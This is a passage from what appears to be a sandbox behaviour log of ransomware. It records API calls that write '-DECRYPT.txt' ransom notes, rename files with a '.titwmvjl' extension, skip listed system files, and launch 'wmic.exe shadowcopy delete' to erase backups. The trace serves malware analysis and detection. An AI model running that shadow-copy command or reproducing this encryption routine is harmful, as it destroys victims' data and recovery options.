(lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.140] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Videos\\\\TITWMVJL-DECRYPT.txt") returned 44 [0097.140] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\videos\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0097.140] GetLastError () returned 0x50 [0097.140] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.140] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.140] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x1c9)) [0097.141] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.141] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0097.141] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.141] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Videos\\d2ca4a09d2ca4deb61a.lock") returned 47 [0097.141] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\videos\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0097.141] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.142] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.142] lstrlenW (lpString="C:\\Users\\Public\\Videos\\") returned 23 [0097.142] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Videos\\*") returned="C:\\Users\\Public\\Videos\\*" [0097.142] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Videos\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503778 [0097.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0097.142] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.143] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0097.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0097.143] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.143] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0097.143] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0097.143] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Public\\Videos\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Public\\Videos\\d2ca4a09d2ca4deb61a.lock" [0097.143] lstrlenW (lpString=".titwmvjl") returned 9 [0097.143] lstrlenW (lpString="C:\\Users\\Public\\Videos\\d2ca4a09d2ca4deb61a.lock") returned 47 [0097.143] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.143] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Videos\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 56 [0097.144] lstrlenW (lpString="C:\\Users\\Public\\Videos\\d2ca4a09d2ca4deb61a.lock") returned 47 [0097.144] lstrlenW (lpString=".lock") returned 5 [0097.144] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.144] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0097.144] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.144] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.144] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.144] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0097.144] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0097.144] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Videos\\desktop.ini") returned="C:\\Users\\Public\\Videos\\desktop.ini" [0097.144] lstrlenW (lpString=".titwmvjl") returned 9 [0097.145] lstrlenW (lpString="C:\\Users\\Public\\Videos\\desktop.ini") returned 34 [0097.145] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.145] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Videos\\desktop.ini.titwmvjl") returned 43 [0097.145] lstrlenW (lpString="C:\\Users\\Public\\Videos\\desktop.ini") returned 34 [0097.145] lstrlenW (lpString=".ini") returned 4 [0097.145] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.145] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0097.145] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0097.145] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.145] lstrlenW (lpString="C:\\Users\\Public\\Videos\\desktop.ini") returned 34 [0097.145] lstrlenW (lpString="C:\\Users\\Public\\Videos\\desktop.ini") returned 34 [0097.145] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0097.145] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.146] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.146] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0097.146] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0097.146] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Videos\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Public\\Videos\\TITWMVJL-DECRYPT.txt" [0097.146] lstrlenW (lpString=".titwmvjl") returned 9 [0097.146] lstrlenW (lpString="C:\\Users\\Public\\Videos\\TITWMVJL-DECRYPT.txt") returned 43 [0097.146] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.146] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Videos\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 52 [0097.146] lstrlenW (lpString="C:\\Users\\Public\\Videos\\TITWMVJL-DECRYPT.txt") returned 43 [0097.146] lstrlenW (lpString=".txt") returned 4 [0097.146] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.146] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0097.147] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0097.147] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.147] lstrlenW (lpString="C:\\Users\\Public\\Videos\\TITWMVJL-DECRYPT.txt") returned 43 [0097.147] lstrlenW (lpString="C:\\Users\\Public\\Videos\\TITWMVJL-DECRYPT.txt") returned 43 [0097.147] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.147] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.147] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0097.147] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.147] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.147] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.147] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0097.147] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0097.147] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.147] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0097.147] FindClose (in: hFindFile=0x503778 | out: hFindFile=0x503778) returned 1 [0097.148] CloseHandle (hObject=0x230) returned 1 [0097.148] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 0 [0097.148] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0097.149] CloseHandle (hObject=0x228) returned 1 [0097.149] FindNextFileW (in: hFindFile=0x5035f8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0097.149] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0097.149] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0097.149] lstrcatW (in: lpString1="C:\\Users\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\TITWMVJL-DECRYPT.txt" [0097.149] lstrlenW (lpString=".titwmvjl") returned 9 [0097.149] lstrlenW (lpString="C:\\Users\\TITWMVJL-DECRYPT.txt") returned 29 [0097.149] VirtualAlloc (lpAddress=0x0, dwSize=0x7a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.149] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 38 [0097.149] lstrlenW (lpString="C:\\Users\\TITWMVJL-DECRYPT.txt") returned 29 [0097.149] lstrlenW (lpString=".txt") returned 4 [0097.149] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.149] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0097.150] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0097.150] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.150] lstrlenW (lpString="C:\\Users\\TITWMVJL-DECRYPT.txt") returned 29 [0097.150] lstrlenW (lpString="C:\\Users\\TITWMVJL-DECRYPT.txt") returned 29 [0097.150] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.150] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.150] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0097.150] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.150] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.150] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.150] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0097.150] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0097.150] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.150] FindNextFileW (in: hFindFile=0x5035f8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 0 [0097.150] FindClose (in: hFindFile=0x5035f8 | out: hFindFile=0x5035f8) returned 1 [0097.151] CloseHandle (hObject=0x220) returned 1 [0097.152] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0097.152] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0097.152] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0097.152] lstrcatW (in: lpString1="C:\\", lpString2="Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows" [0097.152] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0097.152] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0097.152] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.152] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 0 [0097.152] FindClose (in: hFindFile=0x4c9cf8 | out: hFindFile=0x4c9cf8) returned 1 [0097.152] CloseHandle (hObject=0x214) returned 1 [0097.152] VirtualFree (lpAddress=0x2450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.153] RtlExitUserThread (Status=0x0) Thread: id = 6 os_tid = 0xcc0 Thread: id = 7 os_tid = 0xcbc Thread: id = 8 os_tid = 0xcb0 Thread: id = 9 os_tid = 0xca4 Thread: id = 10 os_tid = 0xc9c Thread: id = 18 os_tid = 0xd0 [0106.873] GetTickCount () returned 0x2e8df [0106.873] RtlExitUserThread (Status=0x0) Thread: id = 90 os_tid = 0xb18 Process: id = "2" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x66025000" os_pid = "0x36c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe5c" cmd_line = "\"C:\\Windows\\system32\\wbem\\wmic.exe\" shadowcopy delete" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013da5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5596 start_va = 0x960000 end_va = 0x9c3fff entry_point = 0x960000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 5597 start_va = 0xe10000 end_va = 0x4e0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 5598 start_va = 0x4e10000 end_va = 0x4e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 5599 start_va = 0x4e30000 end_va = 0x4e31fff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 5600 start_va = 0x4e40000 end_va = 0x4e53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e40000" filename = "" Region: id = 5601 start_va = 0x4e60000 end_va = 0x4e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 5602 start_va = 0x4ea0000 end_va = 0x4edffff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 5603 start_va = 0x4ee0000 end_va = 0x4ee3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ee0000" filename = "" Region: id = 5604 start_va = 0x4ef0000 end_va = 0x4ef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ef0000" filename = "" Region: id = 5605 start_va = 0x4f00000 end_va = 0x4f01fff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 5606 start_va = 0x776b0000 end_va = 0x77828fff entry_point = 0x776b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5607 start_va = 0x7e850000 end_va = 0x7e872fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e850000" filename = "" Region: id = 5608 start_va = 0x7e875000 end_va = 0x7e875fff entry_point = 0x0 region_type = private name = "private_0x000000007e875000" filename = "" Region: id = 5609 start_va = 0x7e876000 end_va = 0x7e876fff entry_point = 0x0 region_type = private name = "private_0x000000007e876000" filename = "" Region: id = 5610 start_va = 0x7e87d000 end_va = 0x7e87ffff entry_point = 0x0 region_type = private name = "private_0x000000007e87d000" filename = "" Region: id = 5611 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5612 start_va = 0x7fff0000 end_va = 0x7dfc57b4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5613 start_va = 0x7dfc57b50000 end_va = 0x7ffc57b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc57b50000" filename = "" Region: id = 5614 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5615 start_va = 0x7ffc57d12000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc57d12000" filename = "" Region: id = 5616 start_va = 0x4f70000 end_va = 0x4f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 5617 start_va = 0x5bab0000 end_va = 0x5bb22fff entry_point = 0x5bab0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5618 start_va = 0x5bb30000 end_va = 0x5bb7efff entry_point = 0x5bb30000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5619 start_va = 0x5baa0000 end_va = 0x5baa7fff entry_point = 0x5baa0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5699 start_va = 0x4e10000 end_va = 0x4e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e10000" filename = "" Region: id = 5700 start_va = 0x4e20000 end_va = 0x4e23fff entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 5701 start_va = 0x4f10000 end_va = 0x4f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 5702 start_va = 0x4f80000 end_va = 0x503dfff entry_point = 0x4f80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5703 start_va = 0x5040000 end_va = 0x507ffff entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 5704 start_va = 0x5080000 end_va = 0x50bffff entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 5705 start_va = 0x50f0000 end_va = 0x51effff entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 5706 start_va = 0x51f0000 end_va = 0x522ffff entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 5707 start_va = 0x5320000 end_va = 0x532ffff entry_point = 0x0 region_type = private name = "private_0x0000000005320000" filename = "" Region: id = 5708 start_va = 0x74090000 end_va = 0x740cefff entry_point = 0x74090000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5709 start_va = 0x740d0000 end_va = 0x740d7fff entry_point = 0x740d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5710 start_va = 0x740e0000 end_va = 0x7410ffff entry_point = 0x740e0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5711 start_va = 0x74750000 end_va = 0x747a8fff entry_point = 0x74750000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5712 start_va = 0x747b0000 end_va = 0x747b9fff entry_point = 0x747b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5713 start_va = 0x747c0000 end_va = 0x747ddfff entry_point = 0x747c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5714 start_va = 0x74a00000 end_va = 0x74aabfff entry_point = 0x74a00000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5715 start_va = 0x74f40000 end_va = 0x7502ffff entry_point = 0x74f40000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5716 start_va = 0x75190000 end_va = 0x75305fff entry_point = 0x75190000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5717 start_va = 0x76f20000 end_va = 0x76fddfff entry_point = 0x76f20000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5718 start_va = 0x770c0000 end_va = 0x770c6fff entry_point = 0x770c0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5719 start_va = 0x772b0000 end_va = 0x772f2fff entry_point = 0x772b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5720 start_va = 0x77390000 end_va = 0x77549fff entry_point = 0x77390000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5721 start_va = 0x7e750000 end_va = 0x7e84ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e750000" filename = "" Region: id = 5722 start_va = 0x7e877000 end_va = 0x7e879fff entry_point = 0x0 region_type = private name = "private_0x000000007e877000" filename = "" Region: id = 5723 start_va = 0x7e87a000 end_va = 0x7e87cfff entry_point = 0x0 region_type = private name = "private_0x000000007e87a000" filename = "" Region: id = 5724 start_va = 0x74ab0000 end_va = 0x74abbfff entry_point = 0x74ab0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5725 start_va = 0x4e30000 end_va = 0x4e30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e30000" filename = "" Region: id = 5726 start_va = 0x76fe0000 end_va = 0x77061fff entry_point = 0x76fe0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5727 start_va = 0x4f50000 end_va = 0x4f50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f50000" filename = "" Region: id = 5728 start_va = 0x74080000 end_va = 0x7408cfff entry_point = 0x74080000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5729 start_va = 0x74d30000 end_va = 0x74d8bfff entry_point = 0x74d30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5730 start_va = 0x74010000 end_va = 0x74075fff entry_point = 0x74010000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5731 start_va = 0x743a0000 end_va = 0x743bafff entry_point = 0x743a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5732 start_va = 0x5330000 end_va = 0x5666fff entry_point = 0x5330000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5733 start_va = 0x770d0000 end_va = 0x77161fff entry_point = 0x770d0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5734 start_va = 0x5230000 end_va = 0x5318fff entry_point = 0x5230000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5735 start_va = 0x4f60000 end_va = 0x4f63fff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 5736 start_va = 0x73e80000 end_va = 0x7400ffff entry_point = 0x73e80000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 5751 start_va = 0x5230000 end_va = 0x529ffff entry_point = 0x0 region_type = private name = "private_0x0000000005230000" filename = "" Region: id = 5754 start_va = 0x5670000 end_va = 0x575ffff entry_point = 0x0 region_type = private name = "private_0x0000000005670000" filename = "" Region: id = 5755 start_va = 0x5760000 end_va = 0x58dffff entry_point = 0x0 region_type = private name = "private_0x0000000005760000" filename = "" Region: id = 5756 start_va = 0x5670000 end_va = 0x574ffff entry_point = 0x0 region_type = private name = "private_0x0000000005670000" filename = "" Region: id = 5757 start_va = 0x5750000 end_va = 0x575ffff entry_point = 0x0 region_type = private name = "private_0x0000000005750000" filename = "" Region: id = 5758 start_va = 0x52a0000 end_va = 0x530ffff entry_point = 0x0 region_type = private name = "private_0x00000000052a0000" filename = "" Region: id = 5759 start_va = 0x58e0000 end_va = 0x5a5ffff entry_point = 0x0 region_type = private name = "private_0x00000000058e0000" filename = "" Region: id = 5760 start_va = 0x5760000 end_va = 0x58cffff entry_point = 0x0 region_type = private name = "private_0x0000000005760000" filename = "" Region: id = 5761 start_va = 0x58d0000 end_va = 0x58dffff entry_point = 0x0 region_type = private name = "private_0x00000000058d0000" filename = "" Region: id = 5765 start_va = 0x5760000 end_va = 0x583efff entry_point = 0x5760000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5766 start_va = 0x58c0000 end_va = 0x58cffff entry_point = 0x0 region_type = private name = "private_0x00000000058c0000" filename = "" Region: id = 5767 start_va = 0x5a60000 end_va = 0x5e5ffff entry_point = 0x0 region_type = private name = 